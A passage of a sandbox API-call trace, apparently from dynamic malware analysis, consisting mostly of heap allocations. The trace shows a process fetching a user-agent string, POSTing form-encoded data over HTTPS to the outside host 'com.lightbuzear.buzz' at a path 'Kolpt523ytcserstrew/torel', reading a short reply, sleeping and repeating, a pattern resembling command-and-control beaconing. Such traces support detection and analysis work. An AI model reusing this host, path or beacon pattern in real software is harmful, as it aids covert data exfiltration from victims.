Flags=0x0, Size=0xd) returned 0x481fac0 [0191.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0191.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0191.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fac0 | out: hHeap=0x4780000) returned 1 [0191.698] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f9d0 [0191.698] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814d70 [0191.698] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814d70 | out: hHeap=0x4780000) returned 1 [0191.711] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0191.711] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815180 [0191.711] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0191.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0191.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0191.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0191.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0191.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0191.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa00 [0191.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fad8 [0191.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa00 | out: hHeap=0x4780000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0191.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fad8 | out: hHeap=0x4780000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814e10 [0191.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0191.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e10 | out: hHeap=0x4780000) returned 1 [0191.713] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814f50 [0191.713] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0191.713] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ed8 [0191.713] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0191.713] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0191.726] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0191.744] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0191.744] FreeLibrary (hLibModule=0x71780000) returned 1 [0191.744] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ed8 | out: hHeap=0x4780000) returned 1 [0191.744] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0191.746] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814cf8 [0191.746] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0191.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0191.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0191.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0191.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0191.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0191.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0191.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0191.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0191.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0191.747] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa60 [0191.747] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0191.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f850 [0191.754] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa60 | out: hHeap=0x4780000) returned 1 [0191.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0191.754] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f850 | out: hHeap=0x4780000) returned 1 [0191.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fa00 [0191.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815130 [0191.755] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815130 | out: hHeap=0x4780000) returned 1 [0191.755] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0191.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48150e0 [0191.755] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0191.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814eb0 [0191.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0191.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0191.756] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0191.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0191.756] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0191.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0191.756] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0191.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0191.756] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0191.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f910 [0191.756] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0191.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f8c8 [0191.756] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f910 | out: hHeap=0x4780000) returned 1 [0191.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0191.756] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f8c8 | out: hHeap=0x4780000) returned 1 [0191.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f850 [0191.756] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ed8 [0191.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ed8 | out: hHeap=0x4780000) returned 1 [0191.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0191.757] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0191.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0191.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0191.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0191.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0191.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0191.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0191.758] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0191.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0191.758] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0191.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f940 [0191.758] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0191.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa60 [0191.758] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f940 | out: hHeap=0x4780000) returned 1 [0191.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0191.758] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa60 | out: hHeap=0x4780000) returned 1 [0191.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814d20 [0191.758] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0191.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0191.758] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814d20 | out: hHeap=0x4780000) returned 1 [0191.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814d70 [0191.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0191.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e10 [0191.758] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0191.759] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0191.759] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0191.759] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0191.759] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e10 | out: hHeap=0x4780000) returned 1 [0191.759] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0191.759] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0191.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0191.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0191.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0191.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0191.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0191.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0191.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0191.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f928 [0191.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0191.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f9a0 [0191.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f928 | out: hHeap=0x4780000) returned 1 [0191.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0191.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9a0 | out: hHeap=0x4780000) returned 1 [0191.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814d48 [0191.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0191.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0191.779] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814d48 | out: hHeap=0x4780000) returned 1 [0191.779] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e38 [0191.779] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbda0 [0191.779] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e88 [0191.779] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0191.780] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0191.780] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0191.780] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0192.885] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e88 | out: hHeap=0x4780000) returned 1 [0192.885] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0192.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0192.887] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0192.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0192.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0192.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0192.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0192.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0192.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0192.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0192.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0192.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0192.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa18 [0192.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0192.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f9e8 [0192.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0192.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0192.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9e8 | out: hHeap=0x4780000) returned 1 [0192.887] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48151a8 [0192.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0192.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0192.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48151a8 | out: hHeap=0x4780000) returned 1 [0192.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815130 [0192.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0192.888] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814f00 [0192.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0192.888] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0192.889] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0192.889] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0192.889] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814f00 | out: hHeap=0x4780000) returned 1 [0192.889] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0192.889] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0192.889] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0192.889] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0192.889] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0192.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0192.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0192.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0192.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0192.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0192.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f9e8 [0192.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0192.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f8b0 [0192.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9e8 | out: hHeap=0x4780000) returned 1 [0192.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0192.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f8b0 | out: hHeap=0x4780000) returned 1 [0192.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814f00 [0192.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0192.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0192.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814f00 | out: hHeap=0x4780000) returned 1 [0192.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e88 [0192.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0192.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ed8 [0192.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0192.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0192.891] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0192.891] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0192.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ed8 | out: hHeap=0x4780000) returned 1 [0192.891] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0192.891] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0192.891] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0192.892] FreeLibrary (hLibModule=0x71570000) returned 1 [0192.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0192.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0192.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814eb0 | out: hHeap=0x4780000) returned 1 [0192.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48150e0 | out: hHeap=0x4780000) returned 1 [0192.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814cf8 | out: hHeap=0x4780000) returned 1 [0192.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815180 | out: hHeap=0x4780000) returned 1 [0192.893] Sleep (dwMilliseconds=0x2710) [0192.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0192.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0192.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0192.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0192.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0192.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0192.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0192.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0192.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0192.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa78 [0192.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0192.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa18 [0192.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa78 | out: hHeap=0x4780000) returned 1 [0192.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0192.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0192.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fa60 [0192.910] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815040 [0192.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815040 | out: hHeap=0x4780000) returned 1 [0192.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0192.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814fa0 [0192.911] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0192.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0192.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0192.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0192.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0192.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0192.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0192.911] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0192.911] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0192.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0192.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f910 [0192.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0192.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fac0 [0192.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f910 | out: hHeap=0x4780000) returned 1 [0192.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0192.912] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fac0 | out: hHeap=0x4780000) returned 1 [0192.912] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815040 [0192.912] HeapFree (in: hHeap=0x4780000, 